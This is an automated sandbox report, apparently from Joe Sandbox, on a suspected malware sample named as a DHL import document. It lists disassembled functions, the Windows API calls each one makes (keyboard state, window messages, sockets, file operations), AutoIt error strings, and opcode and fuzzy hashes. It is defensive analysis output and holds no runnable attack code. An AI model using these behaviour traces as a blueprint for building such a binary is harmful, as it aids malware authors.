                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00811651
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008116E4
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008116FB
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00811777
                                                                                          • __freea.LIBCMT ref: 008117A2
                                                                                          • __freea.LIBCMT ref: 008117AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 2829977744-0
                                                                                          • Opcode ID: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
                                                                                          • Instruction ID: 3b7673bc27921aced05ea7ae3d99408d5174b214b3b2b2313684c4320bb6c458
                                                                                          • Opcode Fuzzy Hash: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
                                                                                          • Instruction Fuzzy Hash: 3A91A571E0021A9ADF208E74DC89AEE7BBEFF49714F184659EA05E7281DB35DC80C760
                                                                                          Function 00854523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                          • API String ID: 2610073882-625585964
                                                                                          • Opcode ID: 52edd44ebb316005dbe0f738c1b11fa56779c9954aa06a5bfc4b0069e01026dd
                                                                                          • Instruction ID: 6bc41bd9291d7315ee098b437fd2b518c0562d0295cc09f3a3e11fc66f18cdf5
                                                                                          • Opcode Fuzzy Hash: 52edd44ebb316005dbe0f738c1b11fa56779c9954aa06a5bfc4b0069e01026dd
                                                                                          • Instruction Fuzzy Hash: 45919171A00219ABDF20CFA5C844FAE7BB8FF49719F109559F915EB280D7709989CFA0
                                                                                          Function 00841187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0084125C
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00841284
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008412A8
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008412D8
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0084135F
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008413C4
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00841430
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                          • String ID:
                                                                                          • API String ID: 2550207440-0
                                                                                          • Opcode ID: b8ed39c549d3cc940f87810eef81ad2da9b92d130a84c5b049160c2113c22aaa
                                                                                          • Instruction ID: 04935c39c8a53fe5f7e026149213559388c7e8939009b4acde79d3c2467da363
                                                                                          • Opcode Fuzzy Hash: b8ed39c549d3cc940f87810eef81ad2da9b92d130a84c5b049160c2113c22aaa
                                                                                          • Instruction Fuzzy Hash: 6191D275A0021D9FDF01DFA8C888BBEB7B5FF44315F154029E940EB291DBB8A981CB95
                                                                                          Function 007E948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
                                                                                          • Instruction ID: 45c45fa38699200a766a1bfabce7db86a6f10474a21a4f7df4604bef67b572de
                                                                                          • Opcode Fuzzy Hash: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
                                                                                          • Instruction Fuzzy Hash: C7914A72D01259EFCB10CFAACC88AEEBBB8FF49320F144455E515B7291D778A951CB60
                                                                                          Function 00853947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 0085396B
                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00853A7A
                                                                                          • _wcslen.LIBCMT ref: 00853A8A
                                                                                          • VariantClear.OLEAUT32(?), ref: 00853C1F
                                                                                            • Part of subcall function 00840CDF: VariantInit.OLEAUT32(00000000), ref: 00840D1F
                                                                                            • Part of subcall function 00840CDF: VariantCopy.OLEAUT32(?,?), ref: 00840D28
                                                                                            • Part of subcall function 00840CDF: VariantClear.OLEAUT32(?), ref: 00840D34
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                          • API String ID: 4137639002-1221869570
                                                                                          • Opcode ID: 96897c4052c536c1199803072d152937c048bb2660e38bdf1534f4753b8aa4bd
                                                                                          • Instruction ID: a2e977c3712cda161c6f5caabc69751585f8c6c49774a3afb17bbb30ecb99c0e
                                                                                          • Opcode Fuzzy Hash: 96897c4052c536c1199803072d152937c048bb2660e38bdf1534f4753b8aa4bd
                                                                                          • Instruction Fuzzy Hash: 0C9135746083059FC704DF28C48496AB7E4FB88355F14892EF88ADB351DB35EE49CB92
                                                                                          Function 00854BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0083000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
                                                                                            • Part of subcall function 0083000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
                                                                                            • Part of subcall function 0083000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
                                                                                            • Part of subcall function 0083000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064
                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00854C51
                                                                                          • _wcslen.LIBCMT ref: 00854D59
                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00854DCF
                                                                                          • CoTaskMemFree.OLE32(?), ref: 00854DDA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 614568839-2785691316
                                                                                          • Opcode ID: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
                                                                                          • Instruction ID: 0ef9af7b78b3435bdfb94f14a2d895c0998d34c4e7f55b9f0dddd075015d698d
                                                                                          • Opcode Fuzzy Hash: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
                                                                                          • Instruction Fuzzy Hash: EF912571D0021DEBDF14DFA4D895AEEB7B9FF08314F10416AE915A7241DB749A488FA0
                                                                                          Function 008620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenu.USER32(?), ref: 00862183
                                                                                          • GetMenuItemCount.USER32(00000000), ref: 008621B5
                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008621DD
                                                                                          • _wcslen.LIBCMT ref: 00862213
                                                                                          • GetMenuItemID.USER32(?,?), ref: 0086224D
                                                                                          • GetSubMenu.USER32(?,?), ref: 0086225B
                                                                                            • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
                                                                                            • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
                                                                                            • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008622E3
                                                                                            • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 4196846111-0
                                                                                          • Opcode ID: 14451b9b5cb82651d7ee92ee28e0d06d231301ddb295e2bc22c7fc1d06586839
                                                                                          • Instruction ID: febd086a49c9af7690c9fa6cd96e1c527384f5bab03780f6919a889bad497dbd
                                                                                          • Opcode Fuzzy Hash: 14451b9b5cb82651d7ee92ee28e0d06d231301ddb295e2bc22c7fc1d06586839
                                                                                          • Instruction Fuzzy Hash: 52719E35A00605EFCB10EF68C845AAEB7F1FF88310F158499E816EB341DB34AD418B90
                                                                                          Function 00867E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(00D95258), ref: 00867F37
                                                                                          • IsWindowEnabled.USER32(00D95258), ref: 00867F43
                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0086801E
                                                                                          • SendMessageW.USER32(00D95258,000000B0,?,?), ref: 00868051
                                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00868089
                                                                                          • GetWindowLongW.USER32(00D95258,000000EC), ref: 008680AB
                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008680C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                          • String ID:
                                                                                          • API String ID: 4072528602-0
                                                                                          • Opcode ID: b0b9a5028351c271e31bb2a480d1c99f25447954ced8c5992b155fbcdc78ff88
                                                                                          • Instruction ID: 833cd19092acd995fe1078d56b3fd9b903f10c64a8d081e14c3da3114af74b44
                                                                                          • Opcode Fuzzy Hash: b0b9a5028351c271e31bb2a480d1c99f25447954ced8c5992b155fbcdc78ff88
                                                                                          • Instruction Fuzzy Hash: 5771AD34608604EFEF219F64C884FBABBB5FF1A304F164459F949D7261CB71A844CBA1
                                                                                          Function 0083AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 0083AEF9
                                                                                          • GetKeyboardState.USER32(?), ref: 0083AF0E
                                                                                          • SetKeyboardState.USER32(?), ref: 0083AF6F
                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0083AF9D
                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0083AFBC
                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0083AFFD
                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0083B020
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
                                                                                          • Instruction ID: 766bda9168e31c1524a617da33e0fe3daf51bfb6adbed5f30f33571c9672291c
                                                                                          • Opcode Fuzzy Hash: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
                                                                                          • Instruction Fuzzy Hash: 5551D4E06047D53DFB3A4234C855BBB7EA9BB86304F088589E2D5D54C2C7D9ACC4D791
                                                                                          Function 0083ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(00000000), ref: 0083AD19
                                                                                          • GetKeyboardState.USER32(?), ref: 0083AD2E
                                                                                          • SetKeyboardState.USER32(?), ref: 0083AD8F
                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0083ADBB
                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0083ADD8
                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0083AE17
                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0083AE38
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
                                                                                          • Instruction ID: 0c2c83a70163d4fb53793d654cc225e22d0513a04fd23b5d79f5dac07d9064bf
                                                                                          • Opcode Fuzzy Hash: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
                                                                                          • Instruction Fuzzy Hash: E751C5A15047D53DFB3A8364CC95B7A7E98BB86304F088588E1D5DA8C2D294EC84D792
                                                                                          Function 0080542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00813CD6,?,?,?,?,?,?,?,?,00805BA3,?,?,00813CD6,?,?), ref: 00805470
                                                                                          • __fassign.LIBCMT ref: 008054EB
                                                                                          • __fassign.LIBCMT ref: 00805506
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00813CD6,00000005,00000000,00000000), ref: 0080552C
                                                                                          • WriteFile.KERNEL32(?,00813CD6,00000000,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 0080554B
                                                                                          • WriteFile.KERNEL32(?,?,00000001,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 00805584
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
                                                                                          • Instruction ID: c19720c610a134a72035243b93f6e51ac2eb6081012cb6ef5a4689aa7cf4daac
                                                                                          • Opcode Fuzzy Hash: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
                                                                                          • Instruction Fuzzy Hash: A7519EB1A00649AFDB10CFA8DC95AEEBBF9FF09300F14411AE955E7291E6709A41CF60
                                                                                          Function 007F2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 007F2D4B
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 007F2D53
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 007F2DE1
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 007F2E0C
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 007F2E61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
                                                                                          • Instruction ID: 6d636b31da74532efb0ad8c9f674299e01809a997c425b987b0df01f6dafeb94
                                                                                          • Opcode Fuzzy Hash: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
                                                                                          • Instruction Fuzzy Hash: 32419534B0020DEBCF14DF68C849AAEBBB5BF45364F148155EA14AB353D7399A06CBA1
                                                                                          Function 008510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
                                                                                            • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00851112
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851121
                                                                                          • WSAGetLastError.WSOCK32 ref: 008511C9
                                                                                          • closesocket.WSOCK32(00000000), ref: 008511F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 2675159561-0
                                                                                          • Opcode ID: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
                                                                                          • Instruction ID: 18b738ecdf24ba230d3c835f431cfa3c537eb666be8a47fb4b4ccffe1bf86757
                                                                                          • Opcode Fuzzy Hash: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
                                                                                          • Instruction Fuzzy Hash: EC412531200604AFDB109F24C889BA9BBE9FF44329F149099FD46DB291C774ED45CBE1
                                                                                          Function 0083CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0083CF45
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0083CF7F
                                                                                          • _wcslen.LIBCMT ref: 0083D005
                                                                                          • _wcslen.LIBCMT ref: 0083D01B
                                                                                          • SHFileOperationW.SHELL32(?), ref: 0083D061
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
